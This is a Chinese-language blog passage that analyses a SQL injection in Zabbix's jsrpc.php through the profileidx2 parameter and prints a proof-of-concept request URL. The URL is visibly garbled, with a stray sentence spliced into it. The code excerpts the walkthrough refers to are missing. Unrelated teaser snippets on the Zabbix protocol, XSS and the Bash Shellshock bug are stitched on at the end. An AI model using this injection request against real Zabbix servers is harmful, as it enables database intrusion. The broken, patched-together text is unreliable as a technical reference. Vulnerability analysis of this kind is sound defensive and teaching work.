之前看到zabbix 出現sql注入漏洞,自己來嘗試分析。
ps:我沒找到3.0.3版本的 zabbix ,暫用的是zabbix 2.2.0版本,如果有問題,請大牛指點。
zabbix是乙個基於web介面的提供分布式系統監視以及網路監視功能的企業級的開源解決方案。能監視各種網路引數,保證伺服器系統的安全運營;並提供靈活的通知機制以讓系統管理員快速定位/解決存在的各種問題。
poc如下:
/jsrpc.php?sid=0bcd4ade648214dc&type=我用的zabbix 2.2.0版本嘗試下poc,存在漏洞。9&method=screen.get&
timestamp
=1471403798083
&mode=
2&screenid=&groupid=&hostid=
0&pagefile=history.php&profileidx=web.item.graph&profileidx2=2'
3297&updateprofile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids%5b23297%5d=23297&action=showlatest&filter=&filter_task=&mark_color=1
看下jsrpc.php中的profileidx2引數:
跟著呼叫,然後繼續看下cscreenbuilder中的getscreen:
繼續看api中的screenitem():
呼叫靜態getobject(),如下:
呼叫靜態getapi(),如下:
接下來是new czbxapi():
最後呼叫sql查詢:
綜上,profileidx2引數存在sql注入。
Zabbix協議分析
概述 zabbix使用一種自定義的基於tcp的協議與客戶端進行通訊 zabbix zabbix agent 協議內容 zbxd x01 5 bytes data length 8 bytes 1 will be formatted as 01 00 00 00 00 00 00 00 eight b...
XSS漏洞分析
網頁 客戶端 傳送請求時隱藏可自動執行的指令碼,從而使指令碼跨站執行 cross site scripeting 達到攻擊目的。由於縮寫和css衝突,故使用xss。伺服器介面 http ip port test?name aaa hobby bbb伺服器大致處理過程 string param1 re...
Bash漏洞分析溯源
漏洞編號 cve 2014 6271 漏洞名稱 linux bash遠端可執行漏洞 漏洞影響範圍 所有安裝gnu bash 版本小於或者等於4.3的linux作業系統 漏洞檢測 使用以下命令檢測是否存在此漏洞 env x echo vulnerable bash c echo this is a t...